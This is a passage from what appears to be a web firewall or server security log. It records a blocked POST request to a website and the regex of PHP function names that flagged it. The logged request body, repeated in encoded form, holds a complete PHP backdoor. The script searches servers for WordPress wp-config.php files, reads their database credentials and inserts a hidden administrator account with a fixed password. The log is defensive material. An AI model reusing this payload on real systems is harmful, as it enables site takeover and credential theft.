0%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:01:22","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> XE:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-fetch-user:?1\nupgrade-insecure-requests:1\ncontent-length:12640\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvJRHvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyvLKAyK3Owo25hMJA0nJ9hVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?0\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-mode:navigate\naccept:*\/*\n\nXE=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3